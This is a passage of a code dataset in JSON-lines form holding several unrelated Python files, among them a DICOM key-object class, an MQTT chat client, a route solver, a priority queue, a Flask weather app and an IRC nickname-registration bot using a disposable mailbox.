value=description,\n relationship_type=RelationshipTypeValues.CONTAINS\n )\n item.ContentSequence.append(description_item)\n\n if len(referenced_objects) == 0:\n raise ValueError('At least one object must be referenced.')\n\n # PS3.3 C.17.3 SR Document Content Module\n # Though many Templates in PS3.16 do not require that the Purpose of\n # Reference be conveyed in the Concept Name, a generic Concept Name,\n # such as (260753009, SCT, \"Source\"), may be used, since anonymous\n # (unnamed) Content Items may be undesirable for some implementations\n # (e.g., for which the name of a name-value pair is required).\n name = CodedConcept(\n value='260753009',\n scheme_designator='SCT',\n meaning='Source',\n )\n for ds in referenced_objects:\n reference_item: Union[ImageContentItem, CompositeContentItem]\n if 'Rows' in ds and 'Columns' in ds:\n reference_item = ImageContentItem(\n name=name,\n referenced_sop_class_uid=ds.SOPClassUID,\n referenced_sop_instance_uid=ds.SOPInstanceUID,\n relationship_type=RelationshipTypeValues.CONTAINS\n )\n item.ContentSequence.append(reference_item)\n else:\n reference_item = CompositeContentItem(\n name=name,\n referenced_sop_class_uid=ds.SOPClassUID,\n referenced_sop_instance_uid=ds.SOPInstanceUID,\n relationship_type=RelationshipTypeValues.CONTAINS\n )\n item.ContentSequence.append(reference_item)\n\n self.append(item)\n\n @classmethod\n def from_sequence(\n cls,\n sequence: Sequence[Dataset],\n is_root: bool = True\n ) -> 'KeyObjectSelection':\n \"\"\"Construct object from a sequence of datasets.\n\n Parameters\n ----------\n sequence: Sequence[pydicom.dataset.Dataset]\n Datasets representing \"Key Object Selection\" SR Content Items\n of Value Type CONTAINER (sequence shall only contain a single item)\n is_root: bool, optional\n Whether the sequence is used to contain SR Content Items that are\n intended to be added to an SR document at the root of the document\n content tree\n\n Returns\n -------\n highdicom.ko.KeyObjectSelection\n Content Sequence containing root CONTAINER SR Content Item\n\n \"\"\"\n if len(sequence) == 0:\n raise ValueError('Sequence contains no SR Content Items.')\n if len(sequence) > 1:\n raise ValueError(\n 'Sequence contains more than one SR Content Item.'\n )\n dataset = sequence[0]\n if dataset.ValueType != ValueTypeValues.CONTAINER.value:\n raise ValueError(\n 'Item #1 of sequence is not an appropriate SR Content Item '\n 'because it does not have Value Type CONTAINER.'\n )\n if dataset.ContentTemplateSequence[0].TemplateIdentifier != '2010':\n raise ValueError(\n 'Item #1 of sequence is not an appropriate SR Content Item '\n 'because it does not have Template Identifier \"2010\".'\n )\n instance = ContentSequence.from_sequence(sequence, is_root=True)\n instance.__class__ = KeyObjectSelection\n return cast(KeyObjectSelection, instance)\n\n def get_observer_contexts(\n self,\n observer_type: Optional[Union[CodedConcept, Code]] = None\n ) -> List[ObserverContext]:\n \"\"\"Get observer contexts.\n\n Parameters\n ----------\n observer_type: Union[highdicom.sr.CodedConcept, pydicom.sr.coding.Code, None], optional\n Type of observer (\"Device\" or \"Person\") for which should be filtered\n\n Returns\n -------\n List[highdicom.sr.ObserverContext]\n Observer contexts\n\n \"\"\" # noqa: E501\n root_item = self[0]\n matches = [\n (i, item) for i, item in enumerate(root_item.ContentSequence, 1)\n if item.name == codes.DCM.ObserverType\n ]\n observer_contexts = []\n attributes: Union[\n DeviceObserverIdentifyingAttributes,\n PersonObserverIdentifyingAttributes,\n ]\n for i, (index, item) in enumerate(matches):\n if observer_type is not None:\n if item.value != observer_type:\n continue\n try:\n next_index = matches[i + 1][0]\n except IndexError:\n next_index = -1\n if item.value == codes.DCM.Device:\n attributes = DeviceObserverIdentifyingAttributes.from_sequence(\n sequence=root_item.ContentSequence[index:next_index]\n )\n elif item.value == codes.DCM.Person:\n attributes = PersonObserverIdentifyingAttributes.from_sequence(\n sequence=root_item.ContentSequence[index:next_index]\n )\n else:\n raise ValueError('Unexpected observer type \"{item.meaning}\".')\n context = ObserverContext(\n observer_type=item.value,\n observer_identifying_attributes=attributes\n )\n observer_contexts.append(context)\n return observer_contexts\n\n def get_references(\n self,\n value_type: Optional[ValueTypeValues] = None,\n sop_class_uid: Optional[str] = None\n ) -> List[\n Union[ImageContentItem, CompositeContentItem, WaveformContentItem]\n ]:\n \"\"\"Get referenced objects.\n\n Parameters\n ----------\n value_type: Union[highdicom.sr.ValueTypeValues, None], optional\n Value type of content items that reference objects\n sop_class_uid: Union[str, None], optional\n SOP Class UID of referenced object\n\n Returns\n -------\n List[Union[highdicom.sr.ImageContentItem, highdicom.sr.CompositeContentItem, highdicom.sr.WaveformContentItem]]\n Content items that reference objects\n\n \"\"\" # noqa: E501\n supported_value_types = {\n ValueTypeValues.IMAGE,\n ValueTypeValues.COMPOSITE,\n ValueTypeValues.WAVEFORM,\n }\n if value_type is not None:\n value_type = ValueTypeValues(value_type)\n if value_type not in supported_value_types:\n raise ValueError(\n f'Value type \"{value_type.value}\" is not supported for '\n 'referencing selected objects.'\n )\n expected_value_types = {value_type}\n else:\n expected_value_types = supported_value_types\n return [\n item for item in self[0].ContentSequence\n if (item.value_type in expected_value_types) and (\n sop_class_uid is None or (\n item.referenced_sop_class_uid == sop_class_uid\n )\n )\n ]\n","repo_name":"ImagingDataCommons/highdicom","sub_path":"src/highdicom/ko/content.py","file_name":"content.py","file_ext":"py","file_size_in_byte":10892,"program_lang":"python","lang":"en","doc_type":"code","stars":142,"dataset":"github-code","pt":"3"} +{"seq_id":"30363066379","text":"# 订阅端测试\nimport json\nimport sys\nimport os\nimport paho.mqtt.client as mqtt\nimport time\n\n\ndef on_connect(client,userdata,flags,rc):\n print(\"连接成功\")\n\n client.subscribe(\"test\")\n\n\ndef on_message(client,userdata,msg):\n payload = json.loads(msg.payload.decode())\n print(payload.get(\"user\") + \":\" + payload.get(\"say\"))\n\n\nif __name__ == '__main__':\n TASK_TOPIC = 'test'\n client_id = time.strftime('%Y%m%d%H%M%S', time.localtime(time.time()))\n\n client = mqtt.Client(client_id, transport='tcp')\n client.connect(\"127.0.0.1\", 1883)\n user = input(\"请输入名称:\")\n client.user_data_set(user)\n client.on_connect = on_connect\n client.on_message = on_message\n\n client.loop_start()\n\n while True:\n str = input()\n if str:\n client.publish(\"test\",json.dumps({\"user\":user,\"say\":str}))","repo_name":"040ling/al_api","sub_path":"sub.py","file_name":"sub.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8377626283","text":"from __future__ import print_function\nfrom ortools.constraint_solver import routing_enums_pb2\nfrom ortools.constraint_solver import pywrapcp\n\nclass Tsp:\n\n def create_data_model(self, bins_to_collect, num_vehicles):\n \"\"\"Stores the data for the problem.\"\"\"\n data = {}\n data['distance_matrix'] = []\n for i in range(len(bins_to_collect)):\n distances_from_i = []\n for j in range(len(bins_to_collect)):\n manhattan_distance = abs(bins_to_collect[i][0]-bins_to_collect[j][0])+abs(bins_to_collect[i][1]-bins_to_collect[j][1])\n distances_from_i.append(manhattan_distance)\n data['distance_matrix'].append(distances_from_i)\n data['num_vehicles'] = num_vehicles\n data['depot'] = 0\n return data\n\n\n def print_solution(self, data, manager, routing, solution):\n \"\"\"Prints solution on console.\"\"\"\n max_route_distance = 0\n solution_matrix = []\n for vehicle_id in range(data['num_vehicles']):\n index = routing.Start(vehicle_id)\n # distance, route\n solution_matrix.append([0, []])\n plan_output = 'Route for vehicle {}:\\n'.format(vehicle_id)\n route_distance = 0\n while not routing.IsEnd(index):\n plan_output += ' {} -> '.format(manager.IndexToNode(index))\n solution_matrix[vehicle_id][1].append(manager.IndexToNode(index))\n previous_index = index\n index = solution.Value(routing.NextVar(index))\n route_distance += routing.GetArcCostForVehicle(\n previous_index, index, vehicle_id)\n plan_output += '{}\\n'.format(manager.IndexToNode(index))\n plan_output += 'Distance of the route: {}m\\n'.format(route_distance)\n #print(plan_output)\n max_route_distance = max(route_distance, max_route_distance)\n solution_matrix[vehicle_id][0] = route_distance\n #print('Maximum of the route distances: {}m'.format(max_route_distance))\n print(solution_matrix)\n return solution_matrix\n\n def __init__(self, bins_to_collect, num_vehicles):\n \"\"\"Entry point of the program.\"\"\"\n # Instantiate the data problem.\n data = self.create_data_model(bins_to_collect, num_vehicles)\n\n # Create the routing index manager.\n manager = pywrapcp.RoutingIndexManager(len(data['distance_matrix']),\n data['num_vehicles'], data['depot'])\n\n # Create Routing Model.\n routing = pywrapcp.RoutingModel(manager)\n\n\n def distance_callback(from_index, to_index):\n \"\"\"Returns the distance between the two nodes.\"\"\"\n # Convert from routing variable Index to distance matrix NodeIndex.\n from_node = manager.IndexToNode(from_index)\n to_node = manager.IndexToNode(to_index)\n return data['distance_matrix'][from_node][to_node]\n\n transit_callback_index = routing.RegisterTransitCallback(distance_callback)\n\n # Define cost of each arc.\n routing.SetArcCostEvaluatorOfAllVehicles(transit_callback_index)\n\n # Add Distance constraint.\n dimension_name = 'Distance'\n routing.AddDimension(\n transit_callback_index,\n 0, # no slack\n 3000, # vehicle maximum travel distance\n True, # start cumul to zero\n dimension_name)\n distance_dimension = routing.GetDimensionOrDie(dimension_name)\n distance_dimension.SetGlobalSpanCostCoefficient(100)\n\n\n # Setting first solution heuristic.\n search_parameters = pywrapcp.DefaultRoutingSearchParameters()\n search_parameters.first_solution_strategy = (\n routing_enums_pb2.FirstSolutionStrategy.PATH_CHEAPEST_ARC)\n\n # Solve the problem.\n solution = routing.SolveWithParameters(search_parameters)\n\n # Print solution on console.\n if solution:\n self.routes = self.print_solution(data, manager, routing, solution)\n","repo_name":"julesdruguet/garbage-collect-optimization","sub_path":"tsp.py","file_name":"tsp.py","file_ext":"py","file_size_in_byte":4074,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"28056385915","text":"#!/usr/bin/env python\n\nimport socket\nimport optparse\nimport ssl\nimport time\nimport random\nimport string\nimport sys\nimport thread\nfrom pymailinator.wrapper import Inbox\n\n\n\nclass ircbot(object):\n\n\tdef __init__(self, server, port, nick, pword, ssl, apikey):\n\n\t\tself.server = server\n\t\tself.port = port\n\t\tself.nick = nick\n\t\tself.pword = pword\n\t\tself.code = None\n\t\tself.ssl = ssl\n\t\tself.apikey = None\n\t\tself.email = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(10))\n\t\tself.email = self.email + \"@reconmail.com\"\n\n\n\t\tself.status = {\n\t\t\t\"data\": None,\n\t\t\t\"registered\": False,\n\t\t\t\"connected\": False,\n\t\t\t\"verified\": False,\n\t\t\t\"codegot\": False\n\n\t\t}\n\tdef get_sender(msg):\n\t\tresult = \"\"\n\t\tfor char in msg:\n\t\t\tif char == \"!\":\n\t\t\t\tbreak\n\t\t\tif char != \":\":\n\t\t\t\tresult += char\n\t\treturn result\n\n\tdef get_message(self, msg):\n\t\tresult = \"\"\n\t\ti = 3\n\t\tlength = len(msg)\n\t\twhile i < length:\n\t\t\tresult += msg[i] + \" \"\n\t\t\ti += 1\n\t\tresult = result.lstrip(':')\n\t\treturn result\n\n\tdef connect(self):\n\t\ttry:\n\t\t\tprint(\"[+] Connecting to \" + self.server + \":\" + str(self.port) + \"...\")\n\t\t\tself.irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\t\tself.irc.connect((self.server, self.port))\n\t\t\tif self.ssl == True:\n\t\t\t\tself.irc = ssl.wrap_socket(self.irc)\n\n\t\t\tself.irc.send(bytes(\"USER \" + self.nick +\" \"+ self.nick +\" \"+ self.nick + \" :Reggie!\\r\\n\", \"UTF-8\"))\n\n\t\t\tnickchange = self.changenick()\n\n\t\t\twhile nickchange == 0:\n\t\t\t\tprint(\"[-] Nickname Taken: \" + self.nick)\n\t\t\t\tself.nick = input(\"Enter a new nickname (!quit to quit) > \")\n\t\t\t\tnickchange = self.changenick()\n\n\t\t\tprint(\"[+] Nick successfully changed to: \" + self.nick)\n\n\t\t\tself.irc.send(bytes(\"PRIVMSG nickserv :INOOPE\\r\\n\", \"UTF-8\"))\n\t\t\tprint(\"[+] Connected to \" + self.server + \":\" + str(self.port))\n\t\t\tself.status[\"connected\"] = True\n\n\t\texcept Exception as e:\n\t\t\tprint(\"[-] Error connecting to server: \" + str(e))\n\n\tdef getcode(self):\n\t\ttry:\n\t\t\tinbox = Inbox(self.apikey)\n\t\t\tinbox.get(self.mailname)\n\t\t\tmail = inbox.messages[-1]\n\t\t\tmail.get_message()\n\t\t\ttext = mail.body.split(\" \" + self.nick + \" \")\n\t\t\tcode = text[1].split()[0]\n\n\t\t\tself.code = code\n\t\texcept Exception as e:\n\t\t\tprint(\"[-] Error Obtaining Verification Code: \" + str(e))\n\n\tdef changenick(self):\n\t\tprint(\"[+] Attempting to change nick...\")\n\t\tself.irc.send(bytes(\"NICK \" + self.nick + \"\\r\\n\", \"UTF-8\"))\n\n\t\tstart = time.clock()\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tircmsg = self.recv()\n\t\t\t\tif ircmsg.find(\"PING :\") != -1:\n\t\t\t\t\tself.pong(ircmsg)\n\t\t\t\telif ircmsg.find(\"Please choose a different\") != -1:\n\t\t\t\t\treturn 0\n\t\t\t\telif time.clock() - start > 20:\n\t\t\t\t\treturn 1\n\t\t\texcept Exception as e:\n\t\t\t\tprint(\"[-] Error changing nick: \" + str(e))\n\n\tdef pong(self, msg):\n\t\ttry:\n\t\t\tprint(\"[+] Sending PONG\")\n\t\t\tself.irc.send((\"PONG \" + msg.split()[1] + \"\\r\\n\").encode())\n\t\t\tprint(\"[+] PONG \" + msg.split()[1])\n\t\texcept Exception as e:\n\t\t\tprint(\"[-] Error during PONG: \" + str(e))\n\n\tdef recv(self):\n\t\tself.status[\"data\"] = (self.irc.recv(1024)).decode(\"UTF-8\")\n\t\ttemp = str.split(self.status[\"data\"], \"\\n\")\n\t\tself.status[\"data\"] = temp.pop()\n\n\n\t\treturn ' '.join(temp)\n\n\tdef register(self):\n\t\ttry:\n\n\t\t\tprint(\"[+] Sending Registration\")\n\t\t\tprint(\"[+] Nick: \" + self.nick)\n\t\t\tprint(\"[+] Password: \" + self.pword)\n\t\t\tself.irc.send(bytes(\"PRIVMSG nickserv: register \" + self.pword + self.email + \"\\r\\n\", \"UTF-8\"))\n\t\t\tstart = time.clock()\n\t\t\twhile True:\n\t\t\t\tircmsg = self.recv()\n\t\t\t\tif ircmsg.find(\"PING :\") != -1:\n\t\t\t\t\tself.pong(ircmsg)\n\t\t\t\telif ircmsg.find(\"is now registered to \" + self.email) != -1:\n\t\t\t\t\treturn 1\n\t\t\t\telif ircmsg.find( self.nick + \" registered\") != -1:\n\t\t\t\t\treturn 1\n\t\t\t\telif ircmsg.find(\"GROUP\") != -1:\n\t\t\t\t\treturn -1\n\n\t\t\t\telif time.clock() - start > 60:\n\t\t\t\t\treturn 0\n\t\texcept Exception as e:\n\t\t\tprint(\"[-] Error Sending Registration: \" + str(e))\n\t\t\texit(-1)\n\n\tdef verify(self):\n\t\ttry:\n\t\t\tself.irc.send(bytes(\"PRIVMSG nickserv: verify register \" + self.nick + self.code, \"UTF-8\"))\n\t\t\tprint(\"[+] Attempting Verification\")\n\t\t\tprint(\"[+] Nick: \" + self.nick)\n\t\t\tprint(\"[+] Code: \" + self.code)\n\n\t\t\tstart = time.clock()\n\t\t\twhile True:\n\t\t\t\tircmsg = self.recv()\n\t\t\t\tif ircmsg.find(\"PING :\") != -1:\n\t\t\t\t\tself.pong(ircmsg)\n\t\t\t\telif ircmsg.find(\"has now been verified.\") != -1:\n\t\t\t\t\treturn 1\n\t\t\t\telif time.clock() - start > 20:\n\t\t\t\t\treturn 0\n\t\texcept Exception as e:\n\t\t\tprint(\"[-] Error Sending Verification: \" + str(e))\n\t\t\texit(-1)\n\nif __name__ == '__main__':\n\tparser = optparse.OptionParser()\n\tparser.add_option(\"-s\", \"--server\", help=\"Server to register your nick.\", dest=\"server\", action=\"store\")\n\tparser.add_option(\"-p\", \"--port\", help=\"Port on the server to connect through (usually 6667 or 6697 for SSL).\", dest=\"port\", action=\"store\", type=\"int\")\n\tparser.add_option(\"-n\", \"--nick\", help=\"The nickname to register.\", dest=\"nick\", action=\"store\")\n\tparser.add_option(\"-w\", \"--password\", help=\"Password with which to register the nickname.\", dest=\"pword\", action=\"store\")\n\t#parser.add_option(\"-e\", \"--email\", help=\"Email to send verification code.\", dest=\"email\")\n\tparser.add_option(\"-e\", \"--secure\", help=\"Set if server uses SSL encryption.\", dest=\"ssl\", default=False, action=\"store_true\")\n\tparser.add_option(\"-k\", \"--key\", help=\"Your mailinator API key.\", dest=\"key\", action=\"store\")\n\n\t(opts, args) = parser.parse_args()\n\n\tif opts.server is None:\n\t print(\"Please specify a server.\\n\")\n\t parser.print_help()\n\t exit(-1)\n\telif opts.nick is None:\n\t print(\"Please specify a nickname.\\n\")\n\t parser.print_help()\n\t exit(-1)\n\telif opts.pword is None:\n\t print(\"Please specify a password.\\n\")\n\t parser.print_help()\n\t exit(-1)\n\telif opts.key is None:\n\t print(\"Please specify a Mailinator API key.\\n\")\n\t parser.print_help()\n\t exit(-1)\n\n\tif opts.port is None:\n\t\tif opts.ssl == True:\n\t\t\topts.port = 6697\n\t\telse:\n\t\t\topts.port = 6667\n\t \n\t\tprint(\"No port specified. Defaulting to %d \\n\" % opts.port)\n\n\n\n\n\tregbot = ircbot(opts.server, opts.port, opts.nick, opts.pword, opts.ssl, opts.key)\n\n\tregbot.connect()\n\n\tif regbot.status[\"connected\"] != False:\n\n\t\t\n\t\tprint(\"Waiting to be able to register... (This should take about 2 minutes)\")\n\t\t\n\t\tstart_time = time.clock()\n\n\t\twhile True:\n\n\t\t\ttry:\n\t\t\t\tircmsg = regbot.recv().split()\n\t\t\t\tfor line in ircmsg:\n\t\t\t\t\tline = str.rstrip(line)\n\t\t\t\t\tline = str.split(line)\n\n\t\t\t\t\tif line[0] == \"PING\":\n\t\t\t\t\t\tprint(\"[+] PING Received\")\n\t\t\t\t\t\tregbot.pong(' '.join(ircmsg))\n\t\t\t\t\tif line[1] == \"PRIVMSG\":\n\t\t\t\t\t\tsender = get_sender(line[0])\n\t\t\t\t\t\tmessage = get_message(line)\n\t\t\t\t\t\tprint(sender + \": \" + message)\n\n\t\t\t\tif (regbot.status[\"registered\"] == False) and (time.clock() - start_time > 35):\n\t\t\t\t\tprint(\"[+] Starting Registration Process: \" + str(time.clock()- start_time))\n\t\t\t\t\tregistration = regbot.register()\n\t\t\t\t\tif registration == 1:\n\t\t\t\t\t\tprint(\"[+] Registration Successful\")\n\t\t\t\t\t\tregbot.status[\"registered\"] = True\n\t\t\t\t\telif registration == 0:\n\t\t\t\t\t\tprint(\"[-] Registration Request Timed Out\")\n\t\t\t\t\t\texit(-1)\n\t\t\t\t\telif registration == -1:\n\t\t\t\t\t\tprint(\"[-] Disconnect for a few minutes and try again.\")\n\t\t\t\t\t\texit(-1)\n\t\t\t\telif (regbot.status[\"codegot\"] == False) and (regbot.status[\"registered\"] == True):\n\t\t\t\t\tregbot.getcode()\n\t\t\t\t\tprint(\"[+] Code Received: \" + regbot.code)\n\t\t\t\t\tregbot.status[\"codegot\"] = True\n\t\t\t\telif (regbot.status[\"verified\"] == False) and (regbot.code != None):\n\t\t\t\t\tverification = regbot.verify()\n\t\t\t\t\tif verification == 1:\n\t\t\t\t\t\tprint(\"[+] Verification Successful\")\n\t\t\t\t\t\tregbot.status[\"verified\"] = True\n\t\t\t\t\telif verification == 0:\n\t\t\t\t\t\tprint(\"[-] Verification Request Timed Out\")\n\t\t\t\t\t\tprint(\"[!] If Verification Code is not Blank, Try Verifying Manually\")\n\t\t\t\t\t\texit(0)\n\n\n\t\t\t\t\n\n\t\t\texcept Exception as e:\n\t\t\t\tprint(\"[-] Error while looping: \" + str(e))\n\n","repo_name":"fancyscript/reggie","sub_path":"reggie.py","file_name":"reggie.py","file_ext":"py","file_size_in_byte":7666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14439409633","text":"#!/usr/bin/python3\n\ninf = open('priority-queue.in', 'r')\nouf = open('priority-queue.out', 'w')\n\nH = [None]\n\npos = {}\n\ndef swap(a, b):\n H[a], H[b] = H[b], H[a]\n pos[H[a][1]] = a\n pos[H[b][1]] = b\n\ndef sift_up(v):\n while (v != 1):\n if (H[v // 2] > H[v]):\n break\n else:\n swap(v // 2, v)\n v = v // 2\n\ndef add(elem, prior):\n pos[elem] = len(H)\n H.append((prior, elem))\n sift_up(len(H) - 1)\n\ndef sift_down(v):\n while (2 * v < len(H)):\n ind = 2 * v\n if 2 * v + 1 < len(H) and H[2 * v + 1] > H[2 * v]:\n ind = 2 * v + 1\n if (H[ind] < H[v]):\n break\n swap(v, ind)\n v = ind\n\ndef extract_min():\n assert len(H) > 1\n swap(1, len(H) - 1)\n del pos[H[-1][1]]\n ret = H.pop()\n sift_down(1)\n return ret[1], ret[0]\n\nfor command in inf.readlines():\n command = command.strip().split()\n if (command[0] == 'ADD'):\n add(command[1], int(command[2]))\n elif (command[0] == 'POP'):\n print(*extract_min(), file=ouf)\n else:\n H[pos[command[1]]] = (int(command[2]), command[1])\n sift_up(pos[command[1]])\n sift_down(pos[command[1]])\n","repo_name":"parallel-p/please","sub_path":"problems_on_please/CpyAug2012/contests/day09/priority-queue/solutions/solution_ma.py","file_name":"solution_ma.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"3"} +{"seq_id":"6402130628","text":"from app import app\nfrom flask import render_template, redirect, request\nimport requests\nfrom datetime import date, datetime\n\napi_key = \"\"\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n@app.route('/result', methods=['POST', 'GET'])\ndef result():\n zip_code = request.form['zipcode']\n \n # current weather\n data = get_weather_data(zip_code, api_key)\n temp = \"{0:.2f}\".format(data[\"main\"][\"temp\"])\n feels_like = \"{0:.2f}\".format(data[\"main\"][\"feels_like\"])\n weather = data[\"weather\"][0][\"main\"]\n location = data[\"name\"]\n\n lat = data[\"coord\"][\"lat\"]\n lon = data[\"coord\"][\"lon\"]\n\n # hourly\n data2 = get_weather_data2(lat, lon, api_key)\n h_temp = []\n for x in range(len(data2[\"hourly\"])):\n temperature = \"{0:.2f}\".format(data2[\"hourly\"][x][\"temp\"])\n h_temp.append(temperature)\n\n h_feels_like = []\n for x in range(len(data2[\"hourly\"])):\n feels = \"{0:.2f}\".format(data2[\"hourly\"][x][\"feels_like\"])\n h_feels_like.append(feels)\n\n h_weather = []\n for x in range(len(data2[\"hourly\"])):\n weath = data2[\"hourly\"][x][\"weather\"][0][\"main\"]\n h_weather.append(weath)\n\n hourly = [] \n for x in range(len(data2[\"hourly\"])):\n dt = int(data2[\"hourly\"][x][\"dt\"])\n dt = datetime.utcfromtimestamp(dt).strftime('%H:%M')\n hourly.append(dt)\n\n # daily\n d_temp = []\n for x in range(len(data2[\"daily\"])):\n temperature = data2[\"daily\"][x][\"temp\"][\"day\"]\n d_temp.append(temperature)\n\n d_feels_like_day = []\n for x in range(len(data2[\"daily\"])):\n feels = data2[\"daily\"][x][\"feels_like\"][\"day\"]\n d_feels_like_day.append(feels)\n\n d_feels_like_night = []\n for x in range(len(data2[\"daily\"])):\n feels = data2[\"daily\"][x][\"feels_like\"][\"night\"]\n d_feels_like_night.append(feels)\n\n d_weather = []\n for x in range(len(data2[\"daily\"])):\n weath = data2[\"daily\"][x][\"weather\"][0][\"main\"]\n d_weather.append(weath)\n\n day = []\n for x in range(len(data2[\"daily\"])):\n dt = int(data2[\"daily\"][x][\"dt\"])\n dt = datetime.utcfromtimestamp(dt).strftime('%A')\n day.append(dt)\n\n return render_template('result.html', \n location=location, temp=temp,\n feels_like=feels_like, weather=weather,\n h_temp=h_temp, h_feels_like=h_feels_like,\n h_weather=h_weather, hourly=hourly,\n d_temp=d_temp, d_feels_like_day=d_feels_like_day,\n d_weather=d_weather, d_feels_like_night=d_feels_like_night,\n day=day)\n\n\ndef get_weather_data(zip_code, api_key):\n api_url = \"http://api.openweathermap.org/\" \\\n \"data/2.5/weather?zip={}&units=metric&appid={}\".format(zip_code, api_key)\n r = requests.get(api_url)\n return r.json()\n\ndef get_weather_data2(lat, lon, api_key):\n api_url = \"https://api.openweathermap.org/\" \\\n \"data/2.5/onecall?lat={}&lon={}&units=metric&appid={}\".format(lat,lon, api_key)\n r = requests.get(api_url)\n return r.json()\n","repo_name":"okGus/Weather-Dashboard","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41381091020","text":"# import pypdb\n# info = pypdb.get_info('NAG')\n# import pandas as pd\nimport numpy as np\n\nimport re\natoms = []\nbonds = []\nwith open(\"pdb_files/5b27.pdb\",\"r\") as file:\n for line in file.readlines():\n if line[:4] == \"ATOM\":\n # lines.append(line)\n # coords = \"[\"+\",\".join(re.sub(r' +',\",\",line).split(\",\")[6:9])+\"]\"\n # atoms.append(coords)\n atoms.append(line)\n elif line[:6] == \"CONECT\":\n bonds.append(line)\n\n\nimport pandas as pd\nlen(atoms)\natoms[:10]\nimport sys\nif sys.version_info[0] < 3:\n from StringIO import StringIO\nelse:\n from io import StringIO\n\nfake_file = StringIO(\"\".join(atoms))\npd.read_csv(fake_file, delim_whitespace=True, header=None)\nfake_file2 = StringIO(\"A 0 0 0 0 0\\n\"+\"\".join(bonds))\nd = pd.read_csv(fake_file2, delim_whitespace=True, header=None, dtype={0:str, 1:pd.Int64Dtype(), 2:pd.Int64Dtype(), 3:pd.Int64Dtype(), 4:pd.Int64Dtype(), 5:pd.Int64Dtype()})\n\nbonds=[]\nfor i,r in d.iterrows():\n if i == 0: continue\n print(r[1])\n for c in r[2:]:\n if type(c) == type(0):\n # print(c)\n bonds.append((r[1], c))\n\nbonds\n# lines[0]\n# import re\n# coords = re.sub(r' +',\",\",lines[0]).split(\",\")[6:9]\n# len(lines)\n","repo_name":"guillefix/neosvr-molecule-server","sub_path":"pdbsandbox.py","file_name":"pdbsandbox.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73145093520","text":"import cmath\nimport math\n\n# EXPERIMENTAL\nimport genericObject\n\nNORM_K = (1 / math.sqrt(2))\nFOV = math.pi / 3\nHALF_FOV = FOV/2\nCASTED_RAYS = 120\nSTEP_ANGLE = FOV / CASTED_RAYS\n\n\nclass Player:\n def __init__(self):\n self.state = \"standing\"\n self.location = (0, 0)\n self.speed = 5\n self.sprint = 10\n self.walk = 5\n self.crouch_speed = 2.5\n self.walk_speed = 5\n self.sprint_speed = 10\n self.run_multiplayer = 2\n self.crouch_multiplayer = 0.5\n self.walk_multiplayer = 1\n self.multiplayer = 1\n self.crouch_on = 0\n self.crouch_off = 1\n self.run_on = 2\n self.run_off = 1\n self.velocity = 0\n self.gravity_acceleration = 0.5\n self.jump_force = 15\n self.crouch = 1\n self.direction_h = 0\n self.direction_y = 0\n self.run = 1\n self.hit_box = (100, -100)\n self.stand_hit_box = (100, -200)\n self.crouch_hit_box = (100, -100)\n self.direction = (0, 0)\n self.rotation = (0, 0)\n self.current_speed = 0\n self.angle = 0\n self.player_angle = math.pi\n self.FOV = FOV\n self.HALF_FOV = HALF_FOV\n self.CASTED_RAYS = CASTED_RAYS\n self.STEP_ANGLE = STEP_ANGLE\n\n # EXPERIMENTAL\n self.rigid_body = genericObject.Player(self.location, self.angle)\n\n def move_normalize(self):\n speed_x = round(math.cos(self.angle) * self.current_speed)\n speed_y = round(math.sin(self.angle) * self.current_speed)\n self.location = (self.location[0] + speed_x, self.location[1] + speed_y)\n\n def update_speed(self):\n return self.speed * self.run\n\n def update_angle(self):\n return cmath.phase(complex(self.direction[0], self.direction[1]) * complex(self.rotation[0], self.rotation[1]))\n\n def move_h(self):\n self.location = (self.location[0] + self.direction_h * self.speed * self.run * self.crouch, self.location[1])\n\n def move_v(self):\n self.location = (self.location[0], self.location[1] + self.direction_y * self.speed * self.run * self.crouch)\n\n def setup(self, mouse_location):\n self.direction = (0, 0)\n self.current_speed = 0\n self.rotation = (mouse_location[0] - self.location[0], mouse_location[1] - self.location[1])\n self.angle = cmath.phase(complex(self.rotation[0], self.rotation[1]))\n\n def update(self):\n # ===================EXPERIMENTAL===================\n self.location = self.rigid_body.get_pos()\n # ==================================================\n if self.direction != (0, 0):\n self.angle = self.update_angle()\n self.current_speed = self.update_speed()\n self.move_normalize()\n # ===================EXPERIMENTAL===================\n self.rigid_body.set_pos(self.location)\n # ==================================================\n","repo_name":"yummy2eat/DSS-Engine","sub_path":"src/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":2944,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"32291901126","text":"from django_swagger_utils.drf_server.utils.decorator.interface_decorator \\\n import validate_decorator\nfrom .validator_class import ValidatorClass\nimport dataclasses\nfrom typing import List\n\nfrom reporting_portal.storages.storage_implementation \\\n import StorageImplementation\nfrom reporting_portal.presenters.observation_presenter_implementation \\\n import ObservationPresenterImplementation\nfrom reporting_portal.constants.enums import Severity\nfrom ...interactors.create_observation_interactor import CreateObservationInteractor\n\nSEVERITY = Severity.get_list_of_tuples()\n\n\n@dataclasses.dataclass()\nclass ObservationDto:\n title: str\n category_id: int\n subcategory_id: int\n severity: SEVERITY\n description: str\n attachments: List[str]\n\n\n@validate_decorator(validator_class=ValidatorClass)\ndef api_wrapper(*args, **kwargs):\n request_data = kwargs['request_data']\n title = request_data['title']\n category_id = request_data['category_id']\n sub_category_id = request_data['sub_category_id']\n severity = request_data['severity']\n description = request_data['description']\n attachments = request_data['attachments']\n\n observation_dto = ObservationDto(\n title=title,\n category_id=category_id,\n subcategory_id=sub_category_id,\n severity=severity,\n description=description,\n attachments=attachments\n )\n\n 